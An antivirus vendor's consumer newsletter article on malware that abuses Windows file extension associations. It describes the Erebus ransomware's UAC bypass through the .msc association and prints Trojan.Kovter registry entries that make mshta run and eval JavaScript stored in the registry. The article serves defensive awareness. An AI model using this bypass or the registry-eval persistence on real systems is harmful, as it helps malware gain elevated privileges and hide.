Your browser is obsolete!

The page may not load correctly.

Unexpected guests

Незваные гости

Other issues in this category (70)
  • add to favourites
    Add to Bookmarks

Extending our discussion of extensions

Read: 2160 Comments: 2 Rating: 9

Thursday, September 21, 2017

We’ve already described how cybercriminals use file extensions to cheat users—see the issue “Three letters after the dot”. But our discussion there about the opportunities extensions give attackers was far from exhaustive.

As we already mentioned, the operating system associates an extension with certain actions that will be performed if a user clicks on the file. For example, if the file in question has the “.png” extension, you’ll likely launch a program for viewing or editing graphics files. What will happen if, for example, you click on a file that has the ".torrent" extension?

Program.MediaGet installs itself as the default torrent by modifying the ".torrent" file associations in the registry.

Program.Zona verifies the settings associated with “.torrent” files, and if Zona is not the default program for opening torrent files, it offers to associate itself with them.

In other words, by clicking on the link, you’ll launch a malicious program. And most likely you'll also confirm the application’s launch, thinking that you are running a torrent.

Of course, the Windows user account control (UAC) system will show what’s actually launching, but fraudsters can use extensions to bypass it.

The method for bypassing UAC is below.

  1. Erebus copies itself to the system folder as a file with a random name and then modifies the Windows registry to substitute the association for the “. msc” file extension and to execute a newly created file with a random name.
  2. After this, Erebus launches eventvwr.exe (Event viewer) which automatically opens eventvwr.msc.
  3. As the “.msc” file is no longer associated with mmc.exe (Microsoft Management Console), eventvwr.exe will launch the ransomware file. The event viewer is running in elevated mode, so the executable file will have the same privileges which allows it to bypass UAC.

https://twitter.com/malwrhunterteam/status/828957753121112064

Cybercriminals take advantage of the fact that a number of system programs are downloaded with elevated privileges, and malicious files are launched in their place or in the form of their extensions.

How is the association made? It’s pretty simple. For example, the bodiless Trojan.Kovter.297 registers files that have the extensions it needs and uses them as switches (triggers) for its launch.

SET "#reg_any" Key="\REGISTRY\USER\S-1-5-21-2963211352-318565981-831850675-1001_CLASSES\.2c1a69e" Value="" Type=1 Data=bf1570\0

SET "#reg_any" Key="\REGISTRY\USER\S-1-5-21-2963211352-318565981-831850675-1001_CLASSES\bf1570\shell\open\command" Value="" Type=1 Data=mshta "javascript:qZ7sOhCI8q="EHHH";n7x=new ActiveXObject("WScript.Shell");DsJb4wGJs4="BtEe";j1ZSp8=n7x.RegRead("HKCU\\software\\isidaqnf\\amqoasyj");k7pfpsNfb="1beAz2j";eval(j1ZSp8);EHJ71gfGFX="2OxujZ1jpC";"

The most harmless thing virus writers probably do with extensions involves the file association created by malware to notify victims they need to pay a ransom.

Trojan.Encoder.12950 places a script in the system that will display a message containing demands, and adds it to associations for the “*. Dcry” extension.

#Windows #malware

The Anti-virus Times recommends

  1. The Windows UAC system displays all application launch requests. So don't forget to keep it enabled.
  2. Read UAC system messages attentively to understand exactly what a file is trying to launch.
  3. Use an anti-virus. Only it can keep track of all the tricks hackers come up with.

[Twitter]

Tell us what you think

To leave a comment, you need to log in under your Doctor Web site account. If you don't have an account yet, you can create one.

Comments

Comments to other issues | My comments